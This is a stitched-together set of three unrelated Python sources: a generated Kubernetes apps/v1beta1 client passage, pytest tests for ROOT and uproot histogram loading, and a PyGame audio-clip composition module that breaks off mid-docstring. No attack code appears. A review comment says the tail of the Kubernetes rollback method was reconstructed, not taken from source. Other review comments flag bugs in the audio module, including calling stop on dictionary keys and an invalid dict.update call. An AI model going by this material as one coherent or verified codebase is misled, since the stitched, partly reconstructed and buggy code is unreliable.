        # verify the required parameter 'namespace' is set
        if ('namespace' not in params) or (params['namespace'] is None):
            raise ValueError("Missing the required parameter `namespace` when calling `create_namespaced_controller_revision`")
        # verify the required parameter 'body' is set
        if ('body' not in params) or (params['body'] is None):
            raise ValueError("Missing the required parameter `body` when calling `create_namespaced_controller_revision`")

        collection_formats = {}

        resource_path = '/apis/apps/v1beta1/namespaces/{namespace}/controllerrevisions'.replace('{format}', 'json')
        path_params = {}
        if 'namespace' in params:
            path_params['namespace'] = params['namespace']

        query_params = {}
        if 'pretty' in params:
            query_params['pretty'] = params['pretty']

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in params:
            body_params = params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['*/*'])

        # Authentication setting
        auth_settings = ['BearerToken']

        return self.api_client.call_api(resource_path, 'POST',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='V1beta1ControllerRevision',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        _preload_content=params.get('_preload_content', True),
                                        _request_timeout=params.get('_request_timeout'),
                                        collection_formats=collection_formats)

    def create_namespaced_deployment(self, namespace, body, **kwargs):
        """
        create a Deployment
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.create_namespaced_deployment(namespace, body, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str namespace: object name and auth scope, such as for teams and projects (required)
        :param AppsV1beta1Deployment body: (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :return: AppsV1beta1Deployment
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.create_namespaced_deployment_with_http_info(namespace, body, **kwargs)
        else:
            (data) = self.create_namespaced_deployment_with_http_info(namespace, body, **kwargs)
            return data

    def create_namespaced_deployment_with_http_info(self, namespace, body, **kwargs):
        """
        create a Deployment
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.create_namespaced_deployment_with_http_info(namespace, body, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str namespace: object name and auth scope, such as for teams and projects (required)
        :param AppsV1beta1Deployment body: (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :return: AppsV1beta1Deployment
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['namespace', 'body', 'pretty']
        all_params.append('callback')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method create_namespaced_deployment" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'namespace' is set
        if ('namespace' not in params) or (params['namespace'] is None):
            raise ValueError("Missing the required parameter `namespace` when calling `create_namespaced_deployment`")
        # verify the required parameter 'body' is set
        if ('body' not in params) or (params['body'] is None):
            raise ValueError("Missing the required parameter `body` when calling `create_namespaced_deployment`")

        collection_formats = {}

        resource_path = '/apis/apps/v1beta1/namespaces/{namespace}/deployments'.replace('{format}', 'json')
        path_params = {}
        if 'namespace' in params:
            path_params['namespace'] = params['namespace']

        query_params = {}
        if 'pretty' in params:
            query_params['pretty'] = params['pretty']

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in params:
            body_params = params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['*/*'])

        # Authentication setting
        auth_settings = ['BearerToken']

        return self.api_client.call_api(resource_path, 'POST',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='AppsV1beta1Deployment',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        _preload_content=params.get('_preload_content', True),
                                        _request_timeout=params.get('_request_timeout'),
                                        collection_formats=collection_formats)

    def create_namespaced_deployment_rollback_rollback(self, name, namespace, body, **kwargs):
        """
        create rollback of a DeploymentRollback
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.create_namespaced_deployment_rollback_rollback(name, namespace, body, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str name: name of the DeploymentRollback (required)
        :param str namespace: object name and auth scope, such as for teams and projects (required)
        :param AppsV1beta1DeploymentRollback body: (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :return: AppsV1beta1DeploymentRollback
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.create_namespaced_deployment_rollback_rollback_with_http_info(name, namespace, body, **kwargs)
        else:
            (data) = self.create_namespaced_deployment_rollback_rollback_with_http_info(name, namespace, body, **kwargs)
            return data

    def create_namespaced_deployment_rollback_rollback_with_http_info(self, name, namespace, body, **kwargs):
        """
        create rollback of a DeploymentRollback
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.create_namespaced_deployment_rollback_rollback_with_http_info(name, namespace, body, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str name: name of the DeploymentRollback (required)
        :param str namespace: object name and auth scope, such as for teams and projects (required)
        :param AppsV1beta1DeploymentRollback body: (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :return: AppsV1beta1DeploymentRollback
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['name', 'namespace', 'body', 'pretty']
        all_params.append('callback')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method create_namespaced_deployment_rollback_rollback" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'name' is set
        if ('name' not in params) or (params['name'] is None):
            raise ValueError("Missing the required parameter `name` when calling `create_namespaced_deployment_rollback_rollback`")
        # verify the required parameter 'namespace' is set
        if ('namespace' not in params) or (params['namespace'] is None):
            raise ValueError("Missing the required parameter `namespace` when calling `create_namespaced_deployment_rollback_rollback`")
        # verify the required parameter 'body' is set
        if ('body' not in params) or (params['body'] is None):
            raise ValueError("Missing the required parameter `body` when calling `create_namespaced_deployment_rollback_rollback`")

        collection_formats = {}

        resource_path = '/apis/apps/v1beta1/namespaces/{namespace}/deployments/{name}/rollback'.replace('{format}', 'json')
        path_params = {}
        if 'name' in params:
            path_params['name'] = params['name']
        if 'namespace' in params:
            path_params['namespace'] = params['namespace']

        # NOTE(review): the source fragment was truncated from this point on; the
        # remainder is reconstructed from the sibling *_with_http_info template
        # above -- verify against the upstream generated source.
        query_params = {}
        if 'pretty' in params:
            query_params['pretty'] = params['pretty']

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in params:
            body_params = params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['*/*'])

        # Authentication setting
        auth_settings = ['BearerToken']

        return self.api_client.call_api(resource_path, 'POST',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='AppsV1beta1DeploymentRollback',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        _preload_content=params.get('_preload_content', True),
                                        _request_timeout=params.get('_request_timeout'),
                                        collection_formats=collection_formats)
#!/usr/bin/env python

""" Tests for the utilities module.

.. codeauthor:: <NAME> <<EMAIL>>, Yale University
"""

import ctypes
import logging
import os
from dataclasses import dataclass
from pathlib import Path
from typing import Any, Dict, Iterator, Tuple

import numpy as np
import pytest
import uproot

from pachyderm import histogram
from pachyderm.typing_helpers import Hist

# Setup logger
logger = logging.getLogger(__name__)


@pytest.fixture  # type: ignore
def retrieve_root_list(test_root_hists: Any) -> Iterator[Tuple[str, Any, Any]]:
    """Create a set of lists to load from a ROOT file.

    NOTE: Not using a mock since I'd like to use the real objects and storing a ROOT
    file is just as easy here.

    The expected should look like:

    ```
    {'mainList': OrderedDict([('test', Hist('test_1')), ('test2', Hist('test_2')), ('test3', Hist('test_3')),
        ('innerList', OrderedDict([('test', Hist('test_1')), ('test', Hist('test_2')), ('test', Hist('test_3'))]))])}
    ```

    Yields:
        (filename, root_list, expected): Path to the on-disk ROOT file, the in-memory
            TList, and the expected nested-dict structure for comparison.
    """
    import ROOT

    # Create values for the test
    # We only use 1D hists so we can do the comparison effectively.
    # This is difficult because root hists don't handle operator==
    # very well. Identical hists will be not equal in some cases...
    hists = []
    h = test_root_hists.hist1D
    for i in range(3):
        hists.append(h.Clone("{}_{}".format(h.GetName(), i)))
    l1 = ROOT.TList()
    l1.SetName("mainList")
    l2 = ROOT.TList()
    l2.SetName("innerList")
    l3 = ROOT.TList()
    l3.SetName("secondList")
    # The same histogram objects are shared by all three lists (see the Clear() note below).
    for h in hists:
        l1.Add(h)
        l2.Add(h)
        l3.Add(h)
    # Nest the inner list inside the main list.
    l1.Add(l2)

    # File for comparison.
    filename = os.path.join(os.path.dirname(os.path.realpath(__file__)), "testFiles", "testOpeningList.root")
    # Create the file if needed.
    if not os.path.exists(filename):
        current_directory = ROOT.TDirectory.CurrentDirectory()
        lCopy = l1.Clone("mainList")
        lSecondCopy = l3.Clone("secondList")
        # The objects will be destroyed when l is written.
        # However, we write it under the l name to ensure it is read correctly later
        f = ROOT.TFile(filename, "RECREATE")
        f.cd()
        lCopy.Write(l1.GetName(), ROOT.TObject.kSingleKey)
        lSecondCopy.Write(l3.GetName(), ROOT.TObject.kSingleKey)
        f.Close()
        current_directory.cd()

    # Create expected values
    # See the docstring for an explanation of the format.
    expected = {}
    inner_dict = {}
    main_list = {}
    second_list = {}
    for h in hists:
        inner_dict[h.GetName()] = h
        main_list[h.GetName()] = h
        second_list[h.GetName()] = h
    main_list["innerList"] = inner_dict
    expected["mainList"] = main_list
    expected["secondList"] = second_list

    yield (filename, l1, expected)

    # We need to call Clear() because we reference the same histograms in both the main list
    # the inner list. If we don't explicitly call it on the main list, it may be called on the
    # inner list first, which will then lead to the hists being undefined when Clear() is called
    # on the main list later.
    l1.Clear()


@pytest.mark.ROOT
class TestOpenRootFile:
    # Tests for the RootOpen context manager.

    def test_open_file(self, logging_mixin: Any, retrieve_root_list: Any) -> None:
        """ Test for context manager for opening ROOT files. """
        filename, root_list, expected = retrieve_root_list
        output: Dict[str, Any] = {}
        with histogram.RootOpen(filename=filename) as f:
            for name in ["mainList", "secondList"]:
                histogram._retrieve_object(output, f.Get(name))
        logger.debug(f"{output}")

        # This isn't the most sophisticated way of comparison, but bin-by-bin is sufficient for here.
        # We take advantage that we know the structure of the file so we don't need to handle recursion
        # or higher dimensional hists.
        output_inner_list = output["mainList"].pop("innerList")
        expected_inner_list = expected["mainList"].pop("innerList")
        output_second_list = output.pop("secondList")
        expected_second_list = expected.pop("secondList")
        for (o, e) in [
            (output["mainList"], expected["mainList"]),
            (output_inner_list, expected_inner_list),
            (output_second_list, expected_second_list),
        ]:
            for oHist, eHist in zip(o.values(), e.values()):
                logger.info(f"oHist: {oHist}, eHist: {eHist}")
                # Range includes underflow (0) and overflow (nbins + 1) bins.
                oValues = [oHist.GetBinContent(i) for i in range(0, oHist.GetXaxis().GetNbins() + 2)]
                eValues = [eHist.GetBinContent(i) for i in range(0, eHist.GetXaxis().GetNbins() + 2)]
                assert np.allclose(oValues, eValues)

    def test_failing_to_open_file(self, logging_mixin: Any) -> None:
        """ Test for raising the proper exception for a file that doesn't exist. """
        fake_filename = "fake_filename.root"
        with pytest.raises(IOError) as exception_info:
            with histogram.RootOpen(filename=fake_filename):
                pass
        # Check that the right exception was thrown by proxy via the filename.
        assert "Failed" in exception_info.value.args[0] and f"{fake_filename}" in exception_info.value.args[0]


@pytest.mark.ROOT
class TestRetrievingHistgramsFromAList:
    # Tests for retrieving histograms stored in (possibly nested) TLists.

    def test_get_histograms_in_file(self, logging_mixin: Any, retrieve_root_list: Any) -> None:
        """ Test for retrieving all of the histograms in a ROOT file. """
        (filename, root_list, expected) = retrieve_root_list
        output = histogram.get_histograms_in_file(filename=filename)
        logger.info(f"{output}")

        # This isn't the most sophisticated way of comparison, but bin-by-bin is sufficient for here.
        # We take advantage that we know the structure of the file so we don't need to handle recursion
        # or higher dimensional hists.
        output_inner_list = output["mainList"].pop("innerList")
        expected_inner_list = expected["mainList"].pop("innerList")
        output_second_list = output.pop("secondList")
        expected_second_list = expected.pop("secondList")
        for (o, e) in [
            (output["mainList"], expected["mainList"]),
            (output_inner_list, expected_inner_list),
            (output_second_list, expected_second_list),
        ]:
            for oHist, eHist in zip(o.values(), e.values()):
                logger.info(f"oHist: {oHist}, eHist: {eHist}")
                # Range includes underflow (0) and overflow (nbins + 1) bins.
                oValues = [oHist.GetBinContent(i) for i in range(0, oHist.GetXaxis().GetNbins() + 2)]
                eValues = [eHist.GetBinContent(i) for i in range(0, eHist.GetXaxis().GetNbins() + 2)]
                assert np.allclose(oValues, eValues)

    def test_get_histograms_in_list(self, logging_mixin: Any, retrieve_root_list: Any) -> None:
        """ Test for retrieving a list of histograms from a ROOT file. """
        (filename, root_list, expected) = retrieve_root_list
        output = histogram.get_histograms_in_list(filename, "mainList")
        # The first level of the output is removed by `get_histograms_in_list()`
        expected = expected["mainList"]

        # This isn't the most sophisticated way of comparison, but bin-by-bin is sufficient for here.
        # We take advantage that we know the structure of the file so we don't need to handle recursion
        # or higher dimensional hists.
        output_inner_list = output.pop("innerList")
        expected_inner_list = expected.pop("innerList")
        for (o, e) in [(output, expected), (output_inner_list, expected_inner_list)]:
            for oHist, eHist in zip(o.values(), e.values()):
                # Range includes underflow (0) and overflow (nbins + 1) bins.
                oValues = [oHist.GetBinContent(i) for i in range(0, oHist.GetXaxis().GetNbins() + 2)]
                eValues = [eHist.GetBinContent(i) for i in range(0, eHist.GetXaxis().GetNbins() + 2)]
                assert np.allclose(oValues, eValues)

    def test_get_non_existent_list(self, logging_mixin: Any, retrieve_root_list: Any) -> None:
        """ Test for retrieving a list which doesn't exist from a ROOT file.
        """
        (filename, root_list, expected) = retrieve_root_list
        with pytest.raises(ValueError) as exception_info:
            histogram.get_histograms_in_list(filename, "nonExistent")
        # The offending list name should be reported in the exception.
        assert "nonExistent" in exception_info.value.args[0]

    def test_retrieve_object(self, logging_mixin: Any, retrieve_root_list: Any) -> None:
        """Test for retrieving a list of histograms from a ROOT file.

        NOTE: One would normally expect to have the hists in the first level of the dict,
        but this is actually taken care of in `get_histograms_in_list()`, so we need to
        avoid doing it in the tests here.
        """
        (filename, root_list, expected) = retrieve_root_list
        # Did we actually get histograms? Used when debugging ROOT memory issues that seem to occur after
        # an exception is raised...
        logger.debug(f"{root_list}, {expected}")
        output: Dict[str, Any] = {}
        histogram._retrieve_object(output, root_list)

        # Ignore second list
        expected.pop("secondList")
        assert output == expected


@pytest.fixture  # type: ignore
def setup_histogram_conversion() -> Tuple[str, str, histogram.Histogram1D]:
    """Setup expected values for histogram conversion tests.

    This set of expected values corresponds to:

    >>> hist = ROOT.TH1F("test", "test", 10, 0, 10)
    >>> hist.Fill(3, 2)
    >>> hist.Fill(8)
    >>> hist.Fill(8)
    >>> hist.Fill(8)

    Note: The error on bin 9 (one-indexed) is just sqrt(counts), while the error on bin 4
    is sqrt(4) because we filled it with weight 2 (sumw2 squares these values).

    Returns:
        (filename, hist_name, expected): Path to the stored ROOT file, the name of the
            histogram inside it, and the expected converted Histogram1D.
    """
    expected = histogram.Histogram1D(
        bin_edges=np.linspace(0, 10, 11),
        y=np.array([0, 0, 0, 2, 0, 0, 0, 0, 3, 0]),
        errors_squared=np.array([0, 0, 0, 4, 0, 0, 0, 0, 3, 0]),
    )

    hist_name = "rootHist"
    filename = os.path.join(os.path.dirname(os.path.realpath(__file__)), "testFiles", "convertHist.root")
    if not os.path.exists(filename):
        # Need to create the initial histogram.
        # This shouldn't happen very often, as the file is stored in the repository.
        import ROOT
        root_hist = ROOT.TH1F(hist_name, hist_name, 10, 0, 10)
        root_hist.Fill(3, 2)
        for _ in range(3):
            root_hist.Fill(8)

        # Write out with normal ROOT so we can avoid further dependencies
        fOut = ROOT.TFile(filename, "RECREATE")
        root_hist.Write()
        fOut.Close()

    return filename, hist_name, expected


def check_hist(input_hist: histogram.Histogram1D, expected: histogram.Histogram1D) -> bool:
    """Helper function to compare a given Histogram against expected values.

    Args:
        input_hist (histogram.Histogram1D): Converted histogram.
        expected (histogram.Histogram1D): Expected histogram.
    Returns:
        bool: True if the histograms are the same.
    """
    # Accept either an already-converted Histogram1D or any source type that
    # `from_existing_hist` understands (e.g. ROOT or uproot histograms).
    if not isinstance(input_hist, histogram.Histogram1D):
        h = histogram.Histogram1D.from_existing_hist(input_hist)
    else:
        h = input_hist
    # Ensure that there are entries
    assert len(h.bin_edges) > 0
    # Then check the actual values
    np.testing.assert_allclose(h.bin_edges, expected.bin_edges)
    assert len(h.x) > 0
    np.testing.assert_allclose(h.x, expected.x)
    assert len(h.y) > 0
    np.testing.assert_allclose(h.y, expected.y)
    assert len(h.errors) > 0
    np.testing.assert_allclose(h.errors, expected.errors)

    return True


@pytest.mark.ROOT  # type: ignore
def test_ROOT_hist_to_histogram(setup_histogram_conversion: Any) -> None:
    """ Check conversion of a read in ROOT file via ROOT to a Histogram object. """
    filename, hist_name, expected = setup_histogram_conversion

    # Setup and read histogram
    import ROOT
    fIn = ROOT.TFile(filename, "READ")
    input_hist = fIn.Get(hist_name)

    assert check_hist(input_hist, expected) is True

    # Cleanup
    fIn.Close()


def test_uproot_hist_to_histogram(setup_histogram_conversion: Any) -> None:
    """ Check conversion of a read in ROOT file via uproot to a Histogram object. """
    filename, hist_name, expected = setup_histogram_conversion

    # Retrieve the stored histogram via uproot
    uproot_file = uproot.open(filename)
    input_hist = uproot_file[hist_name]

    assert check_hist(input_hist, expected) is True
# ----------------------------------------------------------------------
#  Composition
#  (decorative ASCII-art banner in the original source, mangled by extraction)
# ----------------------------------------------------------------------

"""
Signifier module to manage the audio clip playback.
"""

from __future__ import annotations

import os
import sys
import random
import schedule
from threading import Thread

from src.sigprocess import ModuleProcess
from src.sigmodule import SigModule
from src.clip import Clip
import src.clipUtils as clipUtils
from src.utils import plural

# Allows PyGame to run without a screen
os.environ["SDL_VIDEODRIVER"] = "dummy"

# Silence PyGame greeting message -- currently not working
# (stdout/stderr are swapped out around the pygame import and restored after)
stdout = sys.__stdout__
stderr = sys.__stderr__
sys.stdout = open(os.devnull, "w")
sys.stderr = open(os.devnull, "w")
import pygame as pg
sys.stdout = stdout
sys.stderr = stderr


class Composition(SigModule):
    """ Audio playback composition manager module. """

    def __init__(self, name: str, config: dict, *args, **kwargs) -> None:
        super().__init__(name, config, *args, **kwargs)
        # Share this module's logger with the clip utility helpers.
        clipUtils.logger = self.logger

    def create_process(self):
        """ Called by the module's `initialise()` method to return a module-specific object. """
        self.process = CompositionProcess(self)


class CompositionProcess(ModuleProcess, Thread):
    """ Controls the playback of an audio clip library.
    """

    def __init__(self, parent: Composition) -> None:
        super().__init__(parent)
        # Composition assets
        self.clip_event = pg.USEREVENT + 1      # PyGame event id fired when a clip finishes
        self.channels = None                    # dict of mixer channels, built by assign_channels()
        self.collections = {}                   # library: {title: {"path": ..., "names": [...]}}
        self.current_collection = {}
        self.base_path = self.config.get("base_path")
        self.fade_in = self.config.get("fade_in_ms", 1000)
        self.fade_out = self.config.get("fade_out_ms", 2000)
        self.mix_volume = self.config.get('mix_volume', 0.5)
        self.inactive_pool = set()              # clips loaded but not playing
        self.active_pool = set()                # clips currently playing
        self.active_jobs = {}
        self.jobs = self.config["jobs"]
        # Maps job names from the config to their scheduling callbacks.
        self.jobs_dict = {
            "collection": self.collection_job,
            "clip_selection": self.clip_selection_job,
            "volume": self.volume_job,
        }
        # Only report success to the parent once both the mixer and library are ready.
        if self.init_mixer() and self.init_library():
            schedule.logger.setLevel('INFO')
            if self.parent_pipe.writable:
                self.parent_pipe.send("initialised")

    def init_mixer(self) -> bool:
        """ Initialises PyGame audio mixer.

        Returns True on success; calls `failed()` and returns False if the
        mixer cannot be initialised.
        """
        self.logger.debug(f'Initialising audio mixer using '
                          f'[{self.config.get("audio_engine", "alsa").upper()}] audio engine...')
        # Mixer parameters must be set before pg.mixer.init().
        pg.mixer.pre_init(
            frequency=self.config["sample_rate"],
            size=self.config["bit_size"],
            channels=1,
            buffer=self.config["buffer"])
        try:
            pg.mixer.init()
        except pg.error as exception:
            self.failed(f'[init_mixer] {exception}')
            return False
        pg.init()
        mix = pg.mixer.get_init()
        self.logger.info(f"Audio mixer initialised with {mix[1]}-bit samples "
                         f"@ {mix[0]} Hz over {mix[2]} channel{plural(mix[2])}.")
        return True

    def init_library(self) -> bool:
        """ Initialises the Clip Manager with a library of Clips.

        Scans each subdirectory of `base_path` for files with a valid audio
        extension and registers non-empty directories as collections.
        Returns True on success, False if the library path is invalid.
        """
        self.logger.debug(f"Library path: {self.base_path}...")
        if not self.validate_library(self.config):
            self.failed("Specified audio library path is invalid.")
            return False
        titles = [
            d for d in os.listdir(self.base_path)
            if os.path.isdir(os.path.join(self.base_path, d))
        ]
        for title in sorted(titles):
            path = os.path.join(self.base_path, title)
            names = []
            for f in os.listdir(path):
                # Compare the file extension (without the leading dot).
                if os.path.splitext(f)[1][1:] in self.config["valid_extensions"]:
                    names.append(f)
            if len(names) != 0:
                self.collections[title] = {"path": path, "names": names}
        self.logger.debug(f'Initialised with ({len(self.collections)}) '
                          f'collection{plural(self.collections)}.')
        return True

    def pre_run(self) -> bool:
        """ Module-specific Process run preparation. """
        self.collection_job()
        return True

    def mid_run(self):
        """ Module-specific Process run commands. Where the bulk of the module's computation occurs. """
        try:
            pg.mixer.get_init()
            schedule.run_pending()
            self.check_clip_events()
        except pg.error as exception:
            self.failed(exception)

    def pre_shutdown(self):
        """ Module-specific shutdown preparation.

        Stops all playback, waits for fades to finish, then releases the
        PyGame mixer and core modules.
        """
        schedule.clear()
        try:
            pg.mixer.get_init()
            self.stop_all_clips()
            self.wait_for_silence()
        except pg.error as exception:
            self.logger.error(f'Could not release mixer: {exception}')
        pg.mixer.quit()
        pg.quit()
        if pg.mixer.get_init() is None:
            self.logger.info('Audio mixer successfully released.')
        else:
            self.logger.warning(f'Audio mixer still initialised while closing playback module.')

    def select_collection(self, **kwargs):
        """ Selects a collection from the library, prepares clips and playback pools.\n
        Will randomly select a collection if valid name is not supplied. """
        name = kwargs.get("name", None)
        num_clips = kwargs.get("num_clips", self.config["default_pool_size"])
        self.logger.debug(
            f'Importing {"random " if name is None else ""}collection '
            f'{(str(name) + " ") if name is not None else ""}from library.'
        )
        if name is not None and name not in self.collections:
            self.logger.warning(
                "Requested collection name does not exist. "
                "One will be randomly selected."
            )
            name = None
        if name is None:
            name = random.choice(list(self.collections.keys()))
        path, names = (self.collections[name]["path"], self.collections[name]["names"])
        self.logger.debug(f'Collection "{name}" with ({len(names)}) '
                          f'clip{plural(names)} loaded.')
        self.current_collection = {"title": name, "path": path, "names": names}
        # Build clips from collection to populate clip manager
        self.clips = set([Clip(path, name, self.config["categories"], self.logger) for name in names])
        self.active_pool = set()
        if (pool := clipUtils.get_distributed(
                self.clips, num_clips,
                strict=self.config.get("strict_distribution", False))) is not None:
            self.inactive_pool = pool
            # NOTE(review): `self.channels` is a dict, so this iterates its integer
            # keys and would call `.stop()` on an int — confirm the intent; it likely
            # should be `self.channels.values()`.
            if self.channels is not None:
                for chan in self.channels:
                    chan.stop()
            self.channels = self.assign_channels(self.inactive_pool, 'clear')
            clipUtils.init_sounds(self.inactive_pool, self.channels)
            self.metrics_pusher.update(f"{self.module_name}_collection", name)
            self.logger.info(f'Now playing collection "{name}" with '
                             f'({len(pool)}) clip{plural(pool)} selected.')
            return self.current_collection
        else:
            self.logger.error(
                f'Failed to retrieve a collection "{name}"! '
                f"Audio files might be corrupted.")
            return None

    def assign_channels(self, clip_set: set, *args) -> dict:
        """ Return dict of channels, where key=(index) and value=(channel object).
        Updates the mixer if there aren't enough channels """
        channels = {}
        num_wanted = len(clip_set)
        if 'clear' in args:
            self.logger.debug('Clearing mixer before building new clips...')
            pg.mixer.set_num_channels(0)
        num_chans = pg.mixer.get_num_channels()
        # Update the audio mixer channel count if required
        if num_chans != num_wanted:
            self.logger.debug(f'Mixer has ({num_chans}) channel{plural(num_chans)}. '
                              f'({num_wanted}) are needed.')
            pg.mixer.set_num_channels(num_wanted)
            num_chans = pg.mixer.get_num_channels()
            self.logger.debug(f"Mixer now assigned ({num_chans}) channel{plural(num_chans)}.")
        for i in range(num_chans):
            channels[i] = pg.mixer.Channel(i)
            channels[i].set_volume(self.mix_volume)
        return channels

    # ----------------
    # Clip management
    # ----------------
    def stop_random_clip(self):
        """ Stop a randomly selected audio clip from the active pool. """
        self.stop_clip()

    def wait_for_silence(self):
        """ Holds up the thread until all channels have faded out. """
        if pg.mixer.get_init() and pg.mixer.get_busy():
            self.logger.debug(f'Waiting for audio mixer '
                              f'to release all channels...')
            # Allow the configured fade-out plus a 0.5 s grace period.
            block_time = self.fade_out / 1000 + 0.5
            self.poll_control(block_for=block_time,
                              abort_event=lambda: (not pg.mixer.get_busy()))
            self.check_clip_events()
            if pg.mixer.get_busy():
                self.logger.warning('Mixer still busy after waiting for silence. '
                                    'Forcing playback to stop on all channels.')
                self.stop_all_clips('now')
            else:
                self.logger.debug("Mixer now silent.")
        else:
            self.logger.debug(f'Mixer not initialised or busy. Ignoring request '
                              f'to wait for silence.')

    def stop_all_clips(self, *args, **kwargs):
        """ Tell all active clips to stop playing, emptying the mixer of\
 active channels.\n `fade_time=(int)` the number of milliseconds active\
 clips should take to fade their volumes before stopping playback.\
 If no parameter is provided, the clip_manager's `fade_out`\
 value from the config.json will be used.\n Use 'disable_events=True'\
 to prevent misfiring audio jobs that use clip end events to launch more.
        """
        fade = kwargs.get("fade_time", self.fade_out)
        if pg.mixer.get_init():
            if pg.mixer.get_busy():
                if fade == 0 or 'now' in args:
                    self.logger.debug(f"Stopping audio clips immediately.")
                    pg.mixer.stop()
                else:
                    self.logger.debug(f"Stopping audio clips with {fade}ms fade...")
                    if kwargs.get("disable_events", False) is True:
                        self.clear_events()
                    pg.mixer.fadeout(fade)
            else:
                self.logger.info(f'Ignoring request to fade out clips, mixer is empty.')
        self.check_clip_events()

    def check_clip_events(self):
        """ Check for audio playback completion events, call the clip manager to clean them up. """
        for event in pg.event.get():
            if event.type == self.clip_event:
                self.check_finished()

    def check_finished(self) -> set:
        """ Checks active pool for lingering Clips finished playback, and moves them to the inactive pool.
        Returns a set containing any clips moved. """
        finished = set()
        for clip in self.active_pool:
            if not clip.channel.get_busy():
                finished.add(clip)
                self.logger.debug(f'Clip "{clip.name}" ENDED on channel ({clip.index}).')
        if len(finished) > 0:
            self.move_to_inactive(finished)
        return finished

    def move_to_inactive(self, clips: set):
        """ Supplied list of Clip(s) are moved from active to inactive pool. """
        for clip in clips:
            self.active_pool.remove(clip)
            self.inactive_pool.add(clip)

    def move_to_active(self, clips: set):
        """ Supplied list of Clip(s) are moved from inactive to active pool. """
        for clip in clips:
            self.inactive_pool.remove(clip)
            self.active_pool.add(clip)

    def play_clip(self, clips=set(), **kwargs) -> set:
        """ Start playback of Clip(s) from the inactive pool, selected by object, name, category, or at random.
        Clips started are moved to the active pool and are returned as a set.
        """
        if len(clips) == 0:
            clips = clipUtils.get_clip(self.inactive_pool, **kwargs)
        # Only clips whose play() succeeded (returned non-None) are moved.
        started = set([c for c in clips if c.play(**kwargs) is not None])
        self.move_to_active(started)
        return started

    def stop_clip(self, clips=set(), *args, **kwargs) -> set:
        """ Stop playback of Clip(s) from the active pool, selected by object, name, category, or at random.
        Clips stopped are moved to the inactive pool and are returned as a set.
        `'balance'` in args will remove clips based on the most active category,
        overriding category in arguments if provided. """
        fade = kwargs.get("fade", self.fade_out)
        if len(clips) == 0:
            # Finds the category with the greatest number of active clips.
            if "balance" in args:
                contents = clipUtils.get_contents(self.active_pool)
                clips = contents[max(contents, key=contents.get)]
                # NOTE(review): dict.update("category", None) raises TypeError —
                # this likely should be kwargs["category"] = None; confirm intent.
                kwargs.update("category", None)
            # NOTE(review): kwargs is passed positionally here, unlike the
            # `**kwargs` expansion in play_clip() — confirm get_clip()'s signature.
            clips = clipUtils.get_clip(self.active_pool, kwargs)
        stopped = set([c for c in clips if c.stop(fade) is not None])
        self.move_to_inactive(stopped)
        return stopped

    def modulate_volumes(self, **kwargs):
        """ Randomly modulate the Channel volumes for all Clip(s) in the active pool.\n
